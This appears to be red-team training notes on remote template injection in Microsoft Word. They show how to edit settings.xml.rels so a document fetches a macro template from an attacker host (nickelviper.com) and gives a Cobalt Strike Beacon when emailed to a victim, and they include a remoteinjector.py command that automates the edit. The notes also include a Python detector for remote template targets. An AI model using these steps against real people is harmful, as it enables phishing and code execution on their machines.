# Remote Template Injection

Microsoft Word can create new documents from a template. Office ships with some templates pre-installed, and you can create custom templates or download new ones. Remote Template Injection is a technique where an attacker sends a victim a benign-looking document that downloads and loads a malicious template when opened. This template may hold a macro, leading to code execution.

Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to `C:\Payloads` as a Word 97-2003 Template (\*.dot) file. This is now our "malicious remote template". Use Cobalt Strike to host this file at *<http://nickelviper.com/template.dot>*.

Next, create a new document from the blank template located in `C:\Users\Attacker\Documents\Custom Office Templates`. Add any content you want, then save it to `C:\Payloads` as a new .docx. Browse to the directory in Explorer, right-click and select *7-Zip > Open archive*. Navigate to *word > _rels*, right-click on `settings.xml.rels` and select *Edit*.

This is just a small XML file. Scroll right until you see the *Target* entry.

```
Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"
```


It's currently pointing to the template on our local disk from which the document was created. Simply modify this so it points to the template URL instead.

```
Target="http://nickelviper.com/template.dot"
```


Save those changes and email the document to Bob. Once the file is opened, you'll see a warning about macros again, but allowing them to run will execute the macro in the hosted template, giving us a Beacon.
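The modified *Target* entry is also what a defender can look for. The following check is an added example, not part of the original notes or of any tool mentioned here: it reads `word/_rels/settings.xml.rels` from a .docx and reports whether the attached template points at a remote location. The function names and the in-memory sample documents are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # consider defusedxml for untrusted files at scale
from urllib.parse import urlparse

RELS_PART = "word/_rels/settings.xml.rels"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
TEMPLATE_TYPE = "/relationships/attachedTemplate"

def attached_templates(docx):
    """Return [(target, is_remote)] for each attached-template relationship."""
    with zipfile.ZipFile(docx) as zf:
        if RELS_PART not in zf.namelist():
            return []  # document has no attached template
        root = ET.fromstring(zf.read(RELS_PART))
    results = []
    for rel in root.iter(PKG_NS + "Relationship"):
        if not rel.get("Type", "").endswith(TEMPLATE_TYPE):
            continue
        target = rel.get("Target", "")
        url = urlparse(target)
        # Remote: web URL, file:// URL naming a host, or a bare UNC path.
        remote = (url.scheme.lower() in ("http", "https")
                  or (url.scheme.lower() == "file" and bool(url.netloc))
                  or target.startswith("\\\\"))
        results.append((target, remote))
    return results

def sample_docx(target):
    """Constructed sample: a zip holding only the relationship part."""
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument'
        '/2006/relationships/attachedTemplate" TargetMode="External" '
        f'Target="{target}"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(RELS_PART, rels)
    return buf

# The two Target values shown above, used as constructed test input.
LOCAL = r"file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"
REMOTE = "http://nickelviper.com/template.dot"

if __name__ == "__main__":
    for value in (LOCAL, REMOTE):
        for target, remote in attached_templates(sample_docx(value)):
            print("REMOTE" if remote else "local ", target)
```

`attached_templates` also accepts a path to a real .docx on disk, so it can be run over mail attachments or a file share.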


***


[John Woodman](https://twitter.com/JohnWoodman15) created a [Python tool](https://github.com/JohnWoodman/remoteinjector) that can automate this process so that we don't have to modify the XML manually.

```
ubuntu@DESKTOP-3BSK7NO ~> python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx
URL Injected and saved to /mnt/c/Payloads/document_new.docx
```
